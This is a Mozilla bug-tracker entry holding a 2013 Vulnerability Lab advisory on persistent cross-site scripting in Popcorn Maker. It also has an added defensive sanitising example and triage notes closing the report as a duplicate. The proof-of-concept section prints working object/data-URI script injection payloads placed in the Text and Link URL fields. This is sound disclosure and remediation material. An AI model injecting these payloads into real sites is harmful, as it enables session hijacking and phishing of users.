Multiple Persistent Vulnerabilities

RESOLVED DUPLICATE of bug 866026

Status

Webmaker
Popcorn Maker

People

(Reporter: curtisk, Assigned: mgoodwin)

Tracking

(Blocks: 1 bug)

Bug Flags:
sec-bounty -

Details

(Whiteboard: [site:popcorn.webmaker.org][wsec-xss])

Attachments

(5 attachments)

Date: Mon, 10 Jun 2013 20:28:04 +0100
From: Vulnerability Lab <admin@vulnerability-lab.com>
To: Mozilla Security <security@mozilla.org>
Subject: Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities
-----//-----
Title:
======
Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities


Date:
=====
2013-06-10


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=966


VL-ID:
=====
966


Common Vulnerability Scoring System:
====================================
3.2


Introduction:
=============
Popcorn adds interactivity and context to online video, pulling the rest
of the web right into the action in real time.
Popcorn lets users link social media, news feeds, data visualizations
and other content directly to moving images.
The result is a new form of multimedia storytelling that lives and
breathes more like the web itself: interactive, social,
and unique each time. Popcorn is the result of ongoing collaboration
between filmmakers, developers and webmakers. Together
we explore how modern browser technologies like HTML5 can reshape moving
images online.

Popcorn Maker makes it easy to enhance, remix and share web video. Use
your web browser to combine video and audio
with content from the rest of the web — from text, links and maps to
pictures and live feeds.

(Copy of the Homepage: https://popcorn.webmaker.org &
https://mozillalabs.com/en-US/Popcorn/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple
persistent web vulnerabilities in the Mozilla Popcorn Maker (Webmaker)
Application.


Report-Timeline:
================
2013-06-06: Researcher Notification & Coordination
2013-06-10: Vendor Notification
2013-00-00: Vendor Response/Feedback
2013-00-00: Vendor Fix/Patch
2013-00-00: Public Disclosure


Status:
========
Unpublished


Affected Products:
==================
Mozilla
Product: Popcorn Maker (Webmaker) 2013 Q2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple persistent input validation web vulnerabilities are detected in
the official Mozilla Popcorn Maker (WebMaker) Web Application.
The vulnerability allows an attacker to inject their own malicious script
code in the vulnerable module on the application side (persistent).

The persistent input validation vulnerabilities are located in the
events and layer modules when processing to add `Text`, `Link URL`,
`Image URL`, `video-container name` with malicious persistent script
code (js/html). The script code will be executed when the website
processes and loads the maliciously manipulated web context of the
earlier input.

Exploitation of the vulnerabilities requires no privileged application
user account but low or medium user interaction.
Successful exploitation results in persistent session hijacking of
Mozilla accounts, persistent phishing, persistent external malware loads
or redirects and persistent module web context manipulation.

Vulnerable Service(s):
[+] Mozilla Corp - Popcorn Maker (Webmaker.org - Mozilla Labs)

Vulnerable Module(s):
[+] Events
[+] Layer

Vulnerable Parameter(s):
[+] Text
[+] Link URL
[+] Image URL
[+] Video Container Name

Affected Section(s):
[+] Index Basic - Listing


Proof of Concept:
=================
The persistent input validation web vulnerabilities can be exploited by
remote attackers without a privileged application user account
with low or medium user interaction. For demonstration or to
reproduce ...


--- Vulnerable Application Modules & Input Fields ---

Module: Events > Text
Input Fields: Text & Link URL

Module: Events > Image
Input Fields: Image URL & Link URL

Module: Events > Popup
Input Fields: Text & Link URL

Module: Layer > Listing
Input Fields: video-container name

Reference(s):
https://popcorn.webmaker.org/templates/basic/


Payload:
<object data="data:text/html,<script>alert(1337)</script>"></object>--benDE


PoC: Property-name (Text) & Link URL

<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(1337)&lt;/script&gt;"&gt;&lt;/object&gt;</textarea>
<div style="top: 105%; left: 50%;" class="butter-tooltip
shift-enter-tooltip-1370021564314 tooltip-no-hover">
Press Shift+Enter for a new line.</div></fieldset><fieldset
style="position: relative;" class="trackevent-property default input">
<label class="property-name">Link URL</label>
<input value="<object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;
data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)
</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;
data:text/html,<script>alert(1337)</script>&quot;></object>"
data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip
text-link-tooltip1370021564317
tooltip-no-hover">Links will be clickable when shared.</div></fieldset>


PoC: trackevent-property textarea - POP!

<fieldset style="position: relative;" class="trackevent-property textarea">
<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">Pop! &lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(VulnerabilityLab)&lt;/script&gt;"&gt;&lt;/object&gt;&lt;object
data="data:text/html,&lt;script&gt;alert(1337)&lt;/script&gt;"&gt;&lt;/object&gt;</textarea>


PoC: linkUrl & text

<label class="property-name">Link URL</label>
<input value="<object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;
data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)
</script>&quot;></object><object
data=&quot;data:text/html,<script>alert(VulnerabilityLab)</script>&quot;></object><object
data=&quot;data:
text/html,<script>alert(1337)</script>&quot;></object>"
data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip
text-link-tooltip1370021564317
tooltip-no-hover">Links will be clickable when shared.</div></fieldset>


Solution:
=========
Restrict the input fields with a secure char filter and parse the input
and output listing in the application.


Risk:
=====
The security risk of the persistent input validation web vulnerabilities
is estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab or its
suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any
vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com -
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or
support@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com
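The advisory's Solution section asks for input restriction and output handling on the affected fields. The following is an added example, not code from Popcorn Maker or from Vulnerability Lab, showing a defender-side treatment of the three user-controlled track-event fields named in the PoC (the `text`, `linkUrl` and `imageUrl` manifest keys): text is HTML-escaped rather than inserted raw, and URLs are accepted only when they parse as absolute http(s) URLs. The field names follow the `data-manifest-key` values in the PoC; the scheme allow-list is an assumption of this example.

```javascript
// Added example (not Popcorn Maker's own code): defensive handling of the
// track-event fields named in the advisory. Field names assumed from the
// data-manifest-key attributes in the PoC; the scheme allow-list is ours.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Escape text so it is safe both as element content and inside a
// double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only absolute http(s) URLs. data:, javascript:, relative paths
// and non-URL garbage (such as the advisory's <object> payload) are
// rejected outright rather than "cleaned".
function safeUrl(candidate) {
  let parsed;
  try {
    parsed = new URL(String(candidate).trim());
  } catch (e) {
    return null; // not a parseable absolute URL
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Normalise one track event's user-controlled fields before they are
// stored or rendered; rejected URLs come back as null.
function sanitizeTrackEvent(event) {
  return {
    text: escapeHtml(event.text || ''),
    linkUrl: safeUrl(event.linkUrl),
    imageUrl: safeUrl(event.imageUrl),
  };
}

// Build the markup for a text event from the sanitised values only.
function renderTextEvent(event) {
  const safe = sanitizeTrackEvent(event);
  return safe.linkUrl
    ? `<a href="${safe.linkUrl}">${safe.text}</a>`
    : `<span>${safe.text}</span>`;
}

// Constructed sample input: the advisory's payload placed in both fields.
const PAYLOAD = '<object data="data:text/html,<script>alert(1337)</script>"></object>--benDE';
const sampleEvent = { text: PAYLOAD, linkUrl: PAYLOAD, imageUrl: 'https://example.org/a.png' };
```

Running `renderTextEvent(sampleEvent)` yields a `<span>` whose content contains no raw `<object>` tag and no link, since the payload is neither a valid URL nor safe as markup.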
assigned to mgoodwin for verification
https://wiki.mozilla.org/Security/Web_Bug_Rotation#Web_Bug_Verification
Assignee: nobody → mgoodwin
Status: UNCONFIRMED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → DUPLICATE
Whiteboard: [reporter-external][verif?] → [site:popcorn.webmaker.org][wsec-xss]
Duplicate of bug: 866026

Comment 8

Hello Mark Goodwin,
the issue has been marked as duplicate in our database after you provided the details. The issue will be deleted from our upcomings to ensure the real researcher gets the full credits for reporting the issue.

Thanks Mark. We appreciate your cooperation and web vulnerability coordination.
~Benjamin Kunz Mejri
Blocks: 943111
Group: websites-security
Flags: sec-bounty-